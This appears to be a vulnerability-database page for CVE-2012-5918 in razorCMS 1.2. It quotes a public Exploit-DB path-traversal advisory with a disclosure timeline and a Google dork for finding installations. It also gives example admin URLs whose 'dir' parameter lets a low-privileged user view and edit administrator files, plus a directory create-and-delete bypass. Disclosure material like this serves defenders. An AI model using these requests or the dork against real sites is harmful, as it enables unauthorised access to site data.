VIR Vulnerability Intelligence Relay

CVE-2012-5918

medium
Published 2012-11-19 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
5.0

Description

razorCMS 1.2 allows remote authenticated users to access administrator directories and files by creating and deleting a directory.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18344 webapps php verified text ยท 3 KB
chap0 ยท 2012-01-10

RazorCMS 1.2 - Directory Traversal

text exploit Source: Exploit-DB 
# Exploit Title: razorCMS 1.2 Path Traversal
# Google Dork: "Powered by razorCMS"
# Date: January 10, 2012
# Author: chap0
# Software Link: http://www.razorcms.co.uk/archive/core/
# Version: 1.2
# Tested on: Ubuntu
# Patch: Upgrade to latest release 1.2.1
# Greetz To: <Insert Name Here>

RazorCMS is vulnerable to Path Traversal, when logged in with
a least privileged user account the user can access the 
administrator's and super administrator's directories and 
files by changing the path in the url. The vulnerabilities exist
in admin_func.php

Patch Time line:
Dec 11, 2011 - Contacted Vendor
Dec 11, 2011 - Vendor Replied ask for details of vulnerability
Dec 12, 2011 - Submitted details
Dec 13, 2011 - No reply asked for an update
Dec 13, 2011 - Vendor Replied asking for a week or two for a fix after the holiday period
Dec 20, 2011 - Emailed Vendor for an update 
Dec 21, 2011 - Vendor confirmed vulnerabilities asked for two weeks time for a fix
Dec 27, 2011 - Emailed vendor some "temp fixes" for the vulnerabilities discovered
Jan  3, 2012 - Emailed vendor more "temp fixes"
Jan  5, 2012 - Vendor replied sent a new updated file v1 admin_func.php
Jan  5, 2012 - Replied to vendor discovered more vulnerabilities
Jan  6, 2012 - Vendor response with new file with fixes v2 admin_func.php
Jan  6, 2012 - Tested discovered more vulnerabilities 
Jan  8, 2012 - Vendor replied with new file v3 admin_func.php
Jan  8, 2012 - Tested, vulnerabilities are fixed reported to vendor
Jan  9, 2012 - Vendor released update 1.2.1
Jan 10, 2012 - Public Disclosure

Path Traversal Details:

The following files and directories are vulnerable to Path Traversal
Attack including any files or directories that the admin or super admin
may create within these directories

http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/
http://razorcms-server/admin/?action=filemanview&dir=backup/
http://razorcms-server/admin/?action=filemanview&dir=/razor_data.txt
http://razorcms-server/admin/?action=filemanview&dir=/index.htm


http://razorcms-server/admin/?action=fileman&dir=razor_temp_logs/
http://razorcms-server/admin/?action=fileman&dir=backup/
http://razorcms-server/admin/?action=fileman&dir=/razor_data.txt
http://razorcms-server/admin/?action=fileman&dir=/index.htm


An example would be if the super admin created a directory within razor_temp_logs
named sekrit which should not be accessible with a least privileged user, the 
least privileged user can change the path as shown below:

http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/

Which also works on files within those directories which the user should not have
access to which at this point gives the user access to view, edit, rename, move,
copy and delete the file.

e.g.

http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt


Another vulnerability exist in this version of razorCMS, if a least privileged user creates
a directory with their logged in credentials, and then deletes the directory, the user will 
then have access to the administrative directories and files.

Application impact
VendorProductVersionsFixed
razorcmsrazorcms1.2

References

CWEs

CWE-264

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.